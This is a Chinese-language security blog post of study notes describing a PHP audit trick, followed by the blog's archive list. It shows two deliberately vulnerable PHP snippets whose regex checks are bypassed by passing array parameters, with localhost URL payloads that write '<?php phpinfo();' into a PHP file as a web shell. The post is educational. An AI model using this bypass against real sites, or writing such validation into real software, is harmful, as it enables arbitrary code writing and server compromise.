2017.12.11学习笔记

web

字数统计: 355阅读时长: 2 min

 2017/12/11  Share







前记

什么都不写就凉了，于是又开始努力学习新知识了~~

一个审计的小trick

<?php
function is_valid($title, $data)
{
    $data = $title . $data;
    return preg_match('|\A[ _a-zA-Z0-9]+\z|is', $data);
}

function write_cache($title, $content)
{
    if (!is_valid($title, $content)) {
        exit("title or content error");
    }

    $filename = "1.php";
    file_put_contents($filename, $content);
}
$title = $_GET['title'];
$content = $_GET['content'];
write_cache($title,$content);

主要问题还是在于

function is_valid($title, $data)
{
    $data = $title . $data;
    return preg_match('|\A[ _a-zA-Z0-9]+\z|is', $data);
}

验证函数的弱类型问题
如果正常传入参数，显然是没有问题的
但如果我们传入数组的话:
payload:

1	http://localhost/web/trick1/index.php?title=sky&content[]=<?php%20phpinfo();

可以清楚看见

H:\wamp64\www\web\trick1\index.php:5:string 'skyArray' (length=8)
H:\wamp64\www\web\trick1\index.php:16:
array (size=1)
  0 => string '<?php phpinfo();,123' (length=20)

此时的数组，传入验证函数里的时候，会变成Array，这样就可以完美的绕过检测了
再看一题:

<?php
$text = $_GET['text'];
if(preg_match('[<>?]', $text)) {
    die('error!');
}
file_put_contents('config.php', $text);

此时我们传入payload：

1	http://localhost/web/trick1/index.php?text=%3C?php%20phpinfo();

会回显:

error!

明显我们的shell被waf拦下了，但如果利用这个弱比较的trick：

1	http://localhost/web/trick1/index.php?text[]=%3C?php%20phpinfo();

则可以成功写入shell

后记

菜鸡太菜……今天才知道这个技巧，大佬们求轻虐

点击赞赏二维码，您的支持将鼓励我继续创作！

Next Post

Jarvis-OJ-Crypto
Previous Post

算法上机题复习

CATALOG

1. 前记
2. 一个审计的小trick
3. 后记



Total : 225

2020

2019

12/132019 FudanCTF Writeup
12/07Paper Summary & LEMNA & Explaining Deep Learning based Security Applications
12/062019 SWPU CTF Web Writeup
12/06Paper Summary & Prototype pollution attack in NodeJS application
12/032019 TMCTF Final & Hack Server
10/192019 巅峰极客 Online WriteUp
09/282019 OGeek Final & Java Web
09/272019 Trend Micro CTF & Java Web
08/152019网络与信息安全领域专项赛Web Writeup
08/032019 De1CTF Writeup
08/02phpggc详解
07/22CVE-2019-9081:Laravel Deserialization RCE Vulnerability
07/22CyBRICS CTF Quals 2019 Web Writeup
07/18Summary of serialization attacks Part 3
07/122019 0ctf final Web Writeup（2）
07/092019 WCTF & P-door
07/042019 神盾杯 final Writeup（2）
07/032019 神盾杯 final Writeup（1）
06/162019 强网杯final Web Writeup
06/102019 0ctf final Web Writeup（1）
05/252019 强网杯online Web Writeup
05/182019 RCTF Web Writeup
05/05Summary of serialization attacks & Part 2
05/05Summary of serialization attacks & Part 1
04/252019西湖论剑AD攻防Web题解
04/12从PHP底层看open_basedir bypass
04/08Some Trick About LFI
03/292019 Pwnhub-Always be with U-Writeup
03/29PHP Parametric Function RCE
03/252019 0CTF Web WriteUp
03/102018 Code Breaking(1) & function
03/102018 Code Breaking(2) & pcrewaf
03/102018 Code Breaking(3) & phplimit
03/102018 Code Breaking(4) & phpmagic
02/25从一道题看imap_open() rce
02/242019 安恒杯 2月月赛 Writeup
02/21浅谈RSA公钥非素数问题
02/192019 Hgame Week4 Crypto&Sign_in_SemiHard
02/182019 Hgame Web Week4 Writeup
02/102019 Hgame Web&Crypto Week3 Writeup
02/052019 Hgame Web Week2 Writeup
01/252019 Hgame Web Week1
01/252019 安恒杯 1月月赛 Writeup
01/22JavaScript侧信道时间测量

2018

12/24Cross-Browser-Tracking-Summary-Part-4
12/21Cross-Browser-Tracking-Summary-Part-3
12/20Cross Browser Tracking Summary Part-2
12/172018 SWPUCTF Web
12/15Cross Browser Tracking Summary Part-1
11/242018 安恒杯 11月月赛writeup
11/17当中国剩余定理邂逅RSA
11/172018 Xctf Final LCTF-Bestphp
11/162018 EIS web
11/122018 HCTF Web Writeup
11/12Artificial Intelligence Review
11/042018 上海大学生信息安全竞赛 web
10/29Symmetric block ciphers Summary - DES & AES
10/132018 护网杯 web writeup
09/242018安恒杯 9月月赛Writeup
09/172018-noxCTF-Crypto-RSA
09/17Crypto-RSA-公钥攻击小结
09/15浅析RSA Padding Attack
09/13Crypto-RSA多等式攻击总结
09/10Pwnhub-Crypto-韩国欧巴
08/252018 安恒8月赛 Writeup
08/25RSA之拒绝套路(2)
08/24Crypto之击破多层加密
08/24RSA之拒绝套路(1)
08/23从一道Crypto题目认识z3
08/202018 WhiteHat writeup
08/18浅析xml之xinclude & xslt
08/17SOAP及相关漏洞研究
08/17php函数默认配置引发的安全问题
08/172018 RealWorld Web Writeup
08/17xss->ssrf->redis
08/17浅析xml及其安全问题
08/16一道CTF题引发的思考-sql注入
08/16Upload-labs&Upload Bypass Summarize
08/16inndy-crypto-writeup
08/15从一道CTF题引发的思考
07/302018 ISITDTU CTF-Web
07/262018 MeePwn-Web-复现
07/232018 巅峰极客-Web补题
07/18东南-复旦保研经历及感想
07/14软件安全复习总结
07/13网络管理复习
06/29安全协议考试重点
06/20DC0531-web
06/13保研机试C++算法复习
06/05Network Management Review
06/04Secure Protocol Review
06/032018.6.1 信息安全铁人三项赛数据赛题解
05/312018.5.18 信息安全铁人三项赛数据赛题解
05/302018.5.5 信息安全铁人三项赛数据赛题解
05/272018RedHat-AD-Web
05/19Json Web Token历险记
05/192018CUMTCTF-Final-Web
05/122018年第四届全国网络空间安全技术大赛
05/012018-RedHat-Web_Misc
04/27线下AD&代码审计&ECShop V2.7.3
04/222018 DDCTF-bitcoin-51%Attack
04/21数据分析-企业渗透过程
04/21流量分析-CTF题目实战
04/162018-XCTF-HITB-PhpLover
04/15Long-Ago-AWD-Flasky
04/132018-XCTF-HITB-WEB
04/112018 0ctf-ezdoor
04/092018 0ctf-login me
04/042018 pwnhub time injection带来的新思路
04/04amazing phpinfo()
04/01Python is the best language
03/23从sql注入到xslt再到xxe的一道ctf题目
03/21从一道题深入mysql字符集与比对方法collation
03/15solveme.peng.kr-web
03/15Some trick in ssrf and unserialize()
03/12N1CTF 2018-Web
03/09php-command/code-injection summary
03/052018安全客元宵节小礼品趣味题
02/27RingZer0-web-sql系列记录
02/272018安恒杯2月月赛web题解
02/25hgame-week4-web
02/21week3-hgame之web粗略记录
02/13happymoctf之web全题解
02/02skysql之union绕waf
02/01HITCTF-WEB题解
01/31moctf-Web题解
01/27最近复现的几个CVE题目
01/27有点意思的3道web题
01/222018 安恒一月月赛部分题解
01/182018 XCTF-赛博地球杯工业互联网安全大赛web部分题解
01/07hackme网站边做边记录

2017

12/29Time_Based_RCE
12/29cms小白审计-typecho反序列漏洞
12/25一道有关密钥编排的DES题目
12/24密码学课程设计之二手撸AES加解密程序
12/24密码学课程设计一之维吉尼亚唯密文破解
12/24密码学课程设计二之手撸DES加解密程序
12/192017 安恒12月赛之VSCMS审计
12/172017 安恒杯-12月月赛
12/15parse_url函数小记
12/142017 pwnhub成功就是要梭哈之学习记录
12/13密码学课程3道古典密码题目
12/13padding oracle和cbc翻转攻击
12/112017.12.11学习笔记
12/11Jarvis-OJ-Crypto
11/27算法上机题复习
11/272017 湖湘杯复赛web400
11/252017 湖湘杯复赛web题解
11/19近期做的其他平台的3道注入题
11/18第三届上海AWD线下赛感悟
11/12MCTF-flappybird题解
11/122017 hctf的3道web题题解
11/052017 上海赛的RSA研究
11/052017 上海线上赛web题解
10/302017 XDCTF线下赛经历及感悟
10/292017 安恒总决赛的一道代码审计
10/282017 geekgame部分web题解
10/27江苏第六届省赛线下AWD感触
10/232017 BDCTF第一轮初赛web题解
10/22ss和kali源遇到的bug记录
10/22安恒秋季线下赛决赛wp
10/15安恒杯Web安全测试赛秋季赛部分wp
10/12安恒秋季测试赛web部分wp
09/08XSS挑战之旅-bugku
09/06过气的00截断
09/06有趣的.htaccess
08/28sql注入—into outfile、load_file()
08/212017 Xman线下赛源码审计
08/19SSRF学习
08/18xml注入攻击学习
08/18密码学自学
08/17Hexo报错，DEP0061
08/16jarvisoj-web
07/25RSA常用工具
07/25github博客之page build failed
07/24docker基础学习
07/23SQLi-LABS(Challenges)(Less-54 ~ Less-65)
07/23SQLi-LABS(Stacked)(Less-39 ~ Less-53)
07/22PHP函数黑魔法小总结
07/20SQLi-LABS(Adv)(Less-23 ~ Less-38)
07/19sql注入的一些技巧原理
07/18SQLi-LABS(Basic)(Less-1 ~ Less-22)
07/18flask的excel导入与导出
07/12.git学习-边学边记录
07/11sniperoj-web
07/10曼切斯特与差分曼切斯特
06/28马原闲聊
06/28openctf-writeup
06/26记一次蛇皮的微机实验考试
06/24计网复习总结
06/22闲着无聊随便写的微机代码
06/21微机实验考试代码
06/21RSA算法研究
06/20GCTF的一道php反序列化题目
06/19CRC32爆破总结
06/18陕西杯web详解
06/18微机实验代码
06/16CBC字节翻转攻击
06/16Bugku-writeup
06/16CUMTCTF-初赛
06/16椭圆加密算法ECC
05/172017-CUMTCTF-Final

缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true